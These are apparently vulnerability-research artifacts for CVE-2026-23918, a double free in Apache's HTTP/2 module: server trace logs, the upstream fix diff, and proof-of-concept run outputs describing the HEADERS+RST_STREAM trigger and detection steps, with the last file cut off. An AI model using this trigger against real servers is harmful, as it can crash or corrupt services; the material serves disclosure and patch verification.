+[Thu Aug 06 15:43:36.413332 2026] [http2:trace1] [pid 921:tid 957] h2_session.c(859): [client 192.168.65.1:57431] h2_session(921-3,DONE,0): pool_cleanup
+[Thu Aug 06 15:43:36.413333 2026] [http2:debug] [pid 921:tid 957] h2_session.c(1459): [client 192.168.65.1:57431] AH03078: h2_session(921-3,DONE,0): transit [DONE] -- pre_close --> [CLEANUP]
+[Thu Aug 06 15:43:36.413334 2026] [http2:trace2] [pid 921:tid 957] h2_mplx.c(502): [client 192.168.65.1:57431] h2_mplx(921-3): start release
+[Thu Aug 06 15:43:36.413336 2026] [http2:trace1] [pid 921:tid 957] h2_mplx.c(518): [client 192.168.65.1:57431] h2_mplx(921-3): release, 0/0/0 streams (total/hold/purge), 0 streams
+[Thu Aug 06 15:43:36.413338 2026] [http2:trace1] [pid 921:tid 957] h2_mplx.c(570): [client 192.168.65.1:57431] h2_mplx(921-3): released
+[Thu Aug 06 15:43:36.413607 2026] [http2:trace1] [pid 921:tid 958] h2_c1.c(246): [client 192.168.65.1:60419] h2_h2, process_conn
+[Thu Aug 06 15:43:36.413621 2026] [http2:trace1] [pid 921:tid 958] h2_c1.c(251): [client 192.168.65.1:60419] h2_h2, process_conn, new connection using protocol 'http/1.1', direct=1, tls acceptable=1
+[Thu Aug 06 15:43:36.413627 2026] [http2:trace1] [pid 921:tid 958] h2_c1.c(281): [client 192.168.65.1:60419] h2_h2, direct mode detected
+[Thu Aug 06 15:43:36.413629 2026] [http2:trace1] [pid 921:tid 958] h2_c1.c(297): [client 192.168.65.1:60419] process_conn
+[Thu Aug 06 15:43:36.413631 2026] [http2:debug] [pid 921:tid 958] h2_stream.c(609): [client 192.168.65.1:60419] AH03082: h2_stream(921-4-0,IDLE): created
+[Thu Aug 06 15:43:36.413661 2026] [http2:debug] [pid 921:tid 958] h2_session.c(1070): [client 192.168.65.1:60419] AH03200: h2_session(921-4,INIT,0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:43:36.413663 2026] [http2:trace1] [pid 921:tid 958] h2_c1.c(300): [client 192.168.65.1:60419] conn_setup
+[Thu Aug 06 15:43:36.413666 2026] [http2:debug] [pid 921:tid 958] h2_session.c(1170): [client 192.168.65.1:60419] AH03201: h2_session(921-4,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:43:36.413669 2026] [http2:debug] [pid 921:tid 958] h2_session.c(1876): [client 192.168.65.1:60419] AH03079: h2_session(921-4,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:43:36.413670 2026] [http2:debug] [pid 921:tid 958] h2_session.c(1459): [client 192.168.65.1:60419] AH03078: h2_session(921-4,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:43:36.413671 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(366): [client 192.168.65.1:60419] h2_c1_io(9): adding 15 data bytes
+[Thu Aug 06 15:43:36.413676 2026] [http2:debug] [pid 921:tid 958] h2_session.c(635): [client 192.168.65.1:60419] AH03068: h2_session(921-4,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:43:36.413678 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(366): [client 192.168.65.1:60419] h2_c1_io(9): adding 13 data bytes
+[Thu Aug 06 15:43:36.413679 2026] [http2:debug] [pid 921:tid 958] h2_session.c(635): [client 192.168.65.1:60419] AH03068: h2_session(921-4,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:43:36.413680 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1369): [client 192.168.65.1:60419] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.413686 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(131): [client 192.168.65.1:60419] h2_session(9)-out: heap[28] 
+[Thu Aug 06 15:43:36.413690 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(131): [client 192.168.65.1:60419] h2_session(9)-out: flush 
+[Thu Aug 06 15:43:36.413705 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(1206): [client 192.168.65.1:60419] h2_mplx(921-4): enter polling timeout=0
+[Thu Aug 06 15:43:36.413708 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(1250): [client 192.168.65.1:60419] h2_mplx(921-4): polling timed out 
+[Thu Aug 06 15:43:36.413710 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(524): [client 192.168.65.1:60419] h2_session(921-4,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.413713 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(506): [client 192.168.65.1:60419] bb_dump(9): c1 in(HEAP[24] HEAP[93])
+[Thu Aug 06 15:43:36.413716 2026] [http2:debug] [pid 921:tid 958] h2_session.c(383): [client 192.168.65.1:60419] AH03066: h2_session(921-4,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.413717 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(464): [client 192.168.65.1:60419] h2_session(921-4,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.413732 2026] [http2:debug] [pid 921:tid 958] h2_stream.c(609): [client 192.168.65.1:60419] AH03082: h2_stream(921-4-1,IDLE): created
+[Thu Aug 06 15:43:36.413734 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1714): [client 192.168.65.1:60419] h2_stream(921-4-1,IDLE): entered state
+[Thu Aug 06 15:43:36.413741 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(790): [client 192.168.65.1:60419] h2_stream(921-4-1,IDLE): add_header: ':method: GET
+[Thu Aug 06 15:43:36.413743 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(790): [client 192.168.65.1:60419] h2_stream(921-4-1,IDLE): add_header: ':scheme: http
+[Thu Aug 06 15:43:36.413744 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(790): [client 192.168.65.1:60419] h2_stream(921-4-1,IDLE): add_header: ':path: /
+[Thu Aug 06 15:43:36.413746 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(790): [client 192.168.65.1:60419] h2_stream(921-4-1,IDLE): add_header: ':authority: 127.0.0.1:18082
+[Thu Aug 06 15:43:36.413748 2026] [http2:debug] [pid 921:tid 958] h2_session.c(376): [client 192.168.65.1:60419] AH10302: h2_stream(921-4-1,IDLE): recv FRAME[HEADERS[length=20, hend=1, stream=1, eos=1]], frames=1/2 (r/s)
+[Thu Aug 06 15:43:36.413752 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(356): [client 192.168.65.1:60419] h2_stream(921-4-1,IDLE): transit to [OPEN]
+[Thu Aug 06 15:43:36.413753 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1714): [client 192.168.65.1:60419] h2_stream(921-4-1,OPEN): entered state
+[Thu Aug 06 15:43:36.413755 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(356): [client 192.168.65.1:60419] h2_stream(921-4-1,OPEN): transit to [HALF_CLOSED_REMOTE]
+[Thu Aug 06 15:43:36.413756 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(276): [client 192.168.65.1:60419] h2_stream(921-4-1,HALF_CLOSED_REMOTE): closing input
+[Thu Aug 06 15:43:36.413757 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1714): [client 192.168.65.1:60419] h2_stream(921-4-1,HALF_CLOSED_REMOTE): entered state
+[Thu Aug 06 15:43:36.413759 2026] [http2:debug] [pid 921:tid 958] h2_session.c(376): [client 192.168.65.1:60419] AH10302: h2_stream(921-4-1,HALF_CLOSED_REMOTE): recv FRAME[RST_STREAM[length=4, flags=0, stream=1,error=8]], frames=2/2 (r/s)
+[Thu Aug 06 15:43:36.413762 2026] [http2:debug] [pid 921:tid 958] h2_session.c(430): [client 192.168.65.1:60419] AH03067: h2_stream(921-4-1): RST_STREAM by client, error=8
+[Thu Aug 06 15:43:36.413763 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(356): [client 192.168.65.1:60419] h2_stream(921-4-1,HALF_CLOSED_REMOTE): transit to [CLOSED]
+[Thu Aug 06 15:43:36.413764 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1714): [client 192.168.65.1:60419] h2_stream(921-4-1,CLOSED): entered state
+[Thu Aug 06 15:43:36.413766 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1702): [client 192.168.65.1:60419] h2_stream(921-4-1,CLOSED): adding h2_eos to c1 out
+[Thu Aug 06 15:43:36.413782 2026] [http2:debug] [pid 921:tid 958] h2_mplx.c(1169): [client 192.168.65.1:60419] h2_stream(921-4-1,CLOSED): very early RST, drop
+[Thu Aug 06 15:43:36.413784 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(645): [client 192.168.65.1:60419] h2_stream(921-4-1,CLOSED): reset, error=5
+[Thu Aug 06 15:43:36.413785 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-1,CLOSED): dispatch event 2
+[Thu Aug 06 15:43:36.413786 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-1,CLOSED): non-state event 2
+[Thu Aug 06 15:43:36.413787 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-1,CLOSED): dispatch event 3
+[Thu Aug 06 15:43:36.413788 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(356): [client 192.168.65.1:60419] h2_stream(921-4-1,CLOSED): transit to [CLEANUP]
+[Thu Aug 06 15:43:36.413789 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(141): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): cleanup, unsubscribing from beam events
+[Thu Aug 06 15:43:36.413791 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(155): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): cleanup, removing from registries
+[Thu Aug 06 15:43:36.413792 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(181): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:43:36.413793 2026] [http2:debug] [pid 921:tid 958] h2_session.c(290): [client 192.168.65.1:60419] AH03065: h2_stream(921-4-1,CLEANUP): closing with err=8 cancel
+[Thu Aug 06 15:43:36.413795 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(645): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): reset, error=8
+[Thu Aug 06 15:43:36.413796 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): dispatch event 2
+[Thu Aug 06 15:43:36.413797 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): non-state event 2
+[Thu Aug 06 15:43:36.413799 2026] [http2:debug] [pid 921:tid 958] h2_mplx.c(1169): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): very early RST, drop
+[Thu Aug 06 15:43:36.413800 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(645): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): reset, error=5
+[Thu Aug 06 15:43:36.413801 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): dispatch event 2
+[Thu Aug 06 15:43:36.413802 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): non-state event 2
+[Thu Aug 06 15:43:36.413804 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): dispatch event 3
+[Thu Aug 06 15:43:36.413805 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): non-state event 3
+[Thu Aug 06 15:43:36.413806 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(141): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): cleanup, unsubscribing from beam events
+[Thu Aug 06 15:43:36.413809 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(155): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): cleanup, removing from registries
+[Thu Aug 06 15:43:36.413810 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(181): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:43:36.413815 2026] [http2:debug] [pid 921:tid 958] h2_stream.c(609): [client 192.168.65.1:60419] AH03082: h2_stream(921-4-3,IDLE): created
+[Thu Aug 06 15:43:36.413816 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1714): [client 192.168.65.1:60419] h2_stream(921-4-3,IDLE): entered state
+[Thu Aug 06 15:43:36.413818 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(790): [client 192.168.65.1:60419] h2_stream(921-4-3,IDLE): add_header: ':method: GET
+[Thu Aug 06 15:43:36.413819 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(790): [client 192.168.65.1:60419] h2_stream(921-4-3,IDLE): add_header: ':scheme: http
+[Thu Aug 06 15:43:36.413820 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(790): [client 192.168.65.1:60419] h2_stream(921-4-3,IDLE): add_header: ':path: /
+[Thu Aug 06 15:43:36.413821 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(790): [client 192.168.65.1:60419] h2_stream(921-4-3,IDLE): add_header: ':authority: 127.0.0.1:18082
+[Thu Aug 06 15:43:36.413823 2026] [http2:debug] [pid 921:tid 958] h2_session.c(376): [client 192.168.65.1:60419] AH10302: h2_stream(921-4-3,IDLE): recv FRAME[HEADERS[length=20, hend=1, stream=3, eos=1]], frames=3/2 (r/s)
+[Thu Aug 06 15:43:36.413825 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(356): [client 192.168.65.1:60419] h2_stream(921-4-3,IDLE): transit to [OPEN]
+[Thu Aug 06 15:43:36.413826 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1714): [client 192.168.65.1:60419] h2_stream(921-4-3,OPEN): entered state
+[Thu Aug 06 15:43:36.413827 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(356): [client 192.168.65.1:60419] h2_stream(921-4-3,OPEN): transit to [HALF_CLOSED_REMOTE]
+[Thu Aug 06 15:43:36.413829 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(276): [client 192.168.65.1:60419] h2_stream(921-4-3,HALF_CLOSED_REMOTE): closing input
+[Thu Aug 06 15:43:36.413830 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1714): [client 192.168.65.1:60419] h2_stream(921-4-3,HALF_CLOSED_REMOTE): entered state
+[Thu Aug 06 15:43:36.413832 2026] [http2:debug] [pid 921:tid 958] h2_session.c(376): [client 192.168.65.1:60419] AH10302: h2_stream(921-4-3,HALF_CLOSED_REMOTE): recv FRAME[RST_STREAM[length=4, flags=0, stream=3,error=8]], frames=4/2 (r/s)
+[Thu Aug 06 15:43:36.413833 2026] [http2:debug] [pid 921:tid 958] h2_session.c(430): [client 192.168.65.1:60419] AH03067: h2_stream(921-4-3): RST_STREAM by client, error=8
+[Thu Aug 06 15:43:36.413834 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(356): [client 192.168.65.1:60419] h2_stream(921-4-3,HALF_CLOSED_REMOTE): transit to [CLOSED]
+[Thu Aug 06 15:43:36.413836 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1714): [client 192.168.65.1:60419] h2_stream(921-4-3,CLOSED): entered state
+[Thu Aug 06 15:43:36.413837 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1702): [client 192.168.65.1:60419] h2_stream(921-4-3,CLOSED): adding h2_eos to c1 out
+[Thu Aug 06 15:43:36.413838 2026] [http2:debug] [pid 921:tid 958] h2_mplx.c(1169): [client 192.168.65.1:60419] h2_stream(921-4-3,CLOSED): very early RST, drop
+[Thu Aug 06 15:43:36.413840 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(645): [client 192.168.65.1:60419] h2_stream(921-4-3,CLOSED): reset, error=5
+[Thu Aug 06 15:43:36.413841 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-3,CLOSED): dispatch event 2
+[Thu Aug 06 15:43:36.413842 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-3,CLOSED): non-state event 2
+[Thu Aug 06 15:43:36.413843 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-3,CLOSED): dispatch event 3
+[Thu Aug 06 15:43:36.413845 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(356): [client 192.168.65.1:60419] h2_stream(921-4-3,CLOSED): transit to [CLEANUP]
+[Thu Aug 06 15:43:36.413846 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(141): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): cleanup, unsubscribing from beam events
+[Thu Aug 06 15:43:36.413847 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(155): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): cleanup, removing from registries
+[Thu Aug 06 15:43:36.413848 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(181): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:43:36.413850 2026] [http2:debug] [pid 921:tid 958] h2_session.c(290): [client 192.168.65.1:60419] AH03065: h2_stream(921-4-3,CLEANUP): closing with err=8 cancel
+[Thu Aug 06 15:43:36.413851 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(645): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): reset, error=8
+[Thu Aug 06 15:43:36.413852 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): dispatch event 2
+[Thu Aug 06 15:43:36.413852 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): non-state event 2
+[Thu Aug 06 15:43:36.413853 2026] [http2:debug] [pid 921:tid 958] h2_mplx.c(1169): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): very early RST, drop
+[Thu Aug 06 15:43:36.413854 2026] [http2:trace1] [pid 921:tid 958] h2_stream.c(645): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): reset, error=5
+[Thu Aug 06 15:43:36.413855 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): dispatch event 2
+[Thu Aug 06 15:43:36.413856 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): non-state event 2
+[Thu Aug 06 15:43:36.413857 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): dispatch event 3
+[Thu Aug 06 15:43:36.413858 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): non-state event 3
+[Thu Aug 06 15:43:36.413859 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(141): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): cleanup, unsubscribing from beam events
+[Thu Aug 06 15:43:36.413860 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(155): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): cleanup, removing from registries
+[Thu Aug 06 15:43:36.413861 2026] [http2:trace2] [pid 921:tid 958] h2_mplx.c(181): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:43:36.413863 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(556): [client 192.168.65.1:60419] h2_session(921-4,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.413864 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(366): [client 192.168.65.1:60419] h2_c1_io(9): adding 9 data bytes
+[Thu Aug 06 15:43:36.413865 2026] [http2:debug] [pid 921:tid 958] h2_session.c(635): [client 192.168.65.1:60419] AH03068: h2_session(921-4,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=5/3 (r/s)
+[Thu Aug 06 15:43:36.413879 2026] [http2:trace2] [pid 921:tid 958] h2_session.c(1369): [client 192.168.65.1:60419] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.413880 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(131): [client 192.168.65.1:60419] h2_session(9)-out: h2eos h2eos heap[9] 
+[Thu Aug 06 15:43:36.413882 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): dispatch event 3
+[Thu Aug 06 15:43:36.413883 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-1,CLEANUP): non-state event 3
+[Thu Aug 06 15:43:36.413884 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(397): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): dispatch event 3
+[Thu Aug 06 15:43:36.413886 2026] [http2:trace2] [pid 921:tid 958] h2_stream.c(409): [client 192.168.65.1:60419] h2_stream(921-4-3,CLEANUP): non-state event 3
+[Thu Aug 06 15:43:36.413887 2026] [http2:trace1] [pid 921:tid 958] h2_mplx.c(758): [client 192.168.65.1:60419] h2_mplx(921-4): stream 1 not found to process
+[Thu Aug 06 15:43:36.413889 2026] [http2:trace1] [pid 921:tid 958] h2_mplx.c(758): [client 192.168.65.1:60419] h2_mplx(921-4): stream 3 not found to process
+[Thu Aug 06 15:43:36.413890 2026] [http2:trace2] [pid 921:tid 958] h2_c1_io.c(131): [client 192.168.65.1:60419] h2_session(9)-out: flush 

--- a/CVE-2026-23918/artifacts/mod_h2-v2.0.36...v2.0.37.diff
+++ b/CVE-2026-23918/artifacts/mod_h2-v2.0.36...v2.0.37.diff
@@ -1,0 +1,136 @@
+diff --git a/ChangeLog b/ChangeLog
+index 00bfeaef..2d442567 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -1,3 +1,8 @@
++v2.0.37
++--------------------------------------------------------------------------------
++  * Prevent double purge of a stream, resulting in a double free.
++  * Restore use of streams own memory allocator.
++
+ v2.0.36
+ --------------------------------------------------------------------------------
+   * Revert change from v2.0.33 that gave streams their own memory
+diff --git a/configure.ac b/configure.ac
+index 9a1d6838..7d4285d4 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -12,7 +12,7 @@
+ #
+ 
+ AC_PREREQ([2.69])
+-AC_INIT([mod_http2], [2.0.36], [stefan@eissing.org])
++AC_INIT([mod_http2], [2.0.37], [stefan@eissing.org])
+ 
+ LT_PREREQ([2.2.6])
+ LT_INIT()
+diff --git a/mod_http2/h2_mplx.c b/mod_http2/h2_mplx.c
+index 470a14ee..8053f60c 100644
+--- a/mod_http2/h2_mplx.c
++++ b/mod_http2/h2_mplx.c
+@@ -126,12 +126,24 @@ int h2_mplx_c1_stream_is_running(h2_mplx *m, h2_stream *stream)
+     return rv;
+ }
+ 
++static int add_for_purge(h2_mplx *m, h2_stream *stream)
++{
++    int i;
++    for (i = 0; i < m->spurge->nelts; ++i) {
++        h2_stream *s = APR_ARRAY_IDX(m->spurge, i, h2_stream*);
++        if (s == stream)  /* already scheduled for purging */
++            return FALSE;
++    }
++    APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;
++    return TRUE;
++}
++
+ static void c1c2_stream_joined(h2_mplx *m, h2_stream *stream)
+ {
+     ap_assert(!stream_is_running(stream));
+     
+     h2_ihash_remove(m->shold, stream->id);
+-    APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;
++    add_for_purge(m, stream);
+ }
+ 
+ static void m_stream_cleanup(h2_mplx *m, h2_stream *stream)
+@@ -164,7 +176,7 @@ static void m_stream_cleanup(h2_mplx *m, h2_stream *stream)
+             ap_log_cerror(APLOG_MARK, APLOG_TRACE2, 0, m->c1,
+                           H2_STRM_MSG(stream, "cleanup, c2 is done, move to spurge"));
+             /* processing has finished */
+-            APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;
++            add_for_purge(m, stream);
+         }
+         else {
+             ap_log_cerror(APLOG_MARK, APLOG_TRACE2, 0, m->c1,
+@@ -178,9 +190,10 @@ static void m_stream_cleanup(h2_mplx *m, h2_stream *stream)
+     }
+     else {
+         /* never started */
+-        ap_log_cerror(APLOG_MARK, APLOG_TRACE2, 0, m->c1,
+-                      H2_STRM_MSG(stream, "cleanup, never started, move to spurge"));
+-        APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;
++        int added = add_for_purge(m, stream);
++        if (added)
++            ap_log_cerror(APLOG_MARK, APLOG_TRACE2, 0, m->c1,
++                          H2_STRM_MSG(stream, "cleanup, never started, move to spurge"));
+     }
+ }
+ 
+diff --git a/mod_http2/h2_session.c b/mod_http2/h2_session.c
+index dda6c771..2f921500 100644
+--- a/mod_http2/h2_session.c
++++ b/mod_http2/h2_session.c
+@@ -111,13 +111,29 @@ static void cleanup_unprocessed_streams(h2_session *session)
+     h2_mplx_c1_streams_do(session->mplx, rst_unprocessed_stream, session);
+ }
+ 
++/* APR callback invoked if allocation fails. */
++static int abort_on_oom(int retcode)
++{
++    ap_abort_on_oom();
++    return retcode; /* unreachable, hopefully. */
++}
++
+ static h2_stream *h2_session_open_stream(h2_session *session, int stream_id,
+                                          int initiated_on)
+ {
+     h2_stream * stream;
++    apr_allocator_t *allocator;
+     apr_pool_t *stream_pool;
++    apr_status_t rv;
++
++    rv = apr_allocator_create(&allocator);
++    if (rv != APR_SUCCESS)
++      return NULL;
+ 
+-    apr_pool_create(&stream_pool, session->pool);
++    apr_allocator_max_free_set(allocator, ap_max_mem_free);
++    apr_pool_create_ex(&stream_pool, session->pool, NULL, allocator);
++    apr_allocator_owner_set(allocator, stream_pool);
++    apr_pool_abort_set(abort_on_oom, stream_pool);
+     apr_pool_tag(stream_pool, "h2_stream");
+ 
+     stream = h2_stream_create(stream_id, stream_pool, session, 
+diff --git a/mod_http2/h2_version.h b/mod_http2/h2_version.h
+index 64e9179e..5c95a7d7 100644
+--- a/mod_http2/h2_version.h
++++ b/mod_http2/h2_version.h
+@@ -27,7 +27,7 @@
+  * @macro
+  * Version number of the http2 module as c string
+  */
+-#define MOD_HTTP2_VERSION "2.0.36-git"
++#define MOD_HTTP2_VERSION "2.0.37-git"
+ 
+ /**
+  * @macro
+@@ -35,7 +35,7 @@
+  * release. This is a 24 bit number with 8 bits for major number, 8 bits
+  * for minor and 8 bits for patch. Version 1.2.3 becomes 0x010203.
+  */
+-#define MOD_HTTP2_VERSION_NUM 0x020024
++#define MOD_HTTP2_VERSION_NUM 0x020025
+ 
+ 
+ #endif /* mod_h2_h2_version_h */

--- a/CVE-2026-23918/artifacts/poc_run_patched.txt
+++ b/CVE-2026-23918/artifacts/poc_run_patched.txt
@@ -1,0 +1,16 @@
+[*] Target http://127.0.0.1:8081 (h2c prior knowledge)
+[*] Baseline fresh-connection health probe: 1 ms (median of 3)
+[!] Sending 30 trigger connections (8 HEADERS+RST couples each). This may kill worker children on a vulnerable server.
+    ... 20/30
+[*] 30/30 trigger connections sent
+[*] Post-trigger probes: 0/3 failed, slowest 3 ms vs baseline 1 ms
+
+[NO CRASH OBSERVED] The primitive did not visibly fire. This is expected on 2.4.67+/2.4.68, with MPM prefork, or with HTTP/2 disabled — but it is NOT proof of safety: with the APR mmap allocator (Debian/Docker) the double free can corrupt silently.
+
+Ground truth on the server (you own it — check it):
+  grep -E 'double free|corruption|exit signal|segfault' /var/log/{apache2,httpd}/error_log*
+Version facts that decide exposure regardless of this test:
+  httpd -v            # 2.4.66 = vulnerable window only
+  apache2ctl -M       # mpm_event/worker + http2_module required
+  Debian/Ubuntu: check the package changelog — the fix was
+  backported into 2.4.66 packages on 2026-01-23.

--- a/CVE-2026-23918/artifacts/poc_run_vulnerable.txt
+++ b/CVE-2026-23918/artifacts/poc_run_vulnerable.txt
@@ -1,0 +1,16 @@
+[*] Target http://127.0.0.1:8080 (h2c prior knowledge)
+[*] Baseline fresh-connection health probe: 1 ms (median of 3)
+[!] Sending 30 trigger connections (8 HEADERS+RST couples each). This may kill worker children on a vulnerable server.
+    ... 20/30
+[*] 30/30 trigger connections sent
+[*] Post-trigger probes: 0/3 failed, slowest 2 ms vs baseline 1 ms
+
+[NO CRASH OBSERVED] The primitive did not visibly fire. This is expected on 2.4.67+/2.4.68, with MPM prefork, or with HTTP/2 disabled — but it is NOT proof of safety: with the APR mmap allocator (Debian/Docker) the double free can corrupt silently.
+
+Ground truth on the server (you own it — check it):
+  grep -E 'double free|corruption|exit signal|segfault' /var/log/{apache2,httpd}/error_log*
+Version facts that decide exposure regardless of this test:
+  httpd -v            # 2.4.66 = vulnerable window only
+  apache2ctl -M       # mpm_event/worker + http2_module required
+  Debian/Ubuntu: check the package changelog — the fix was
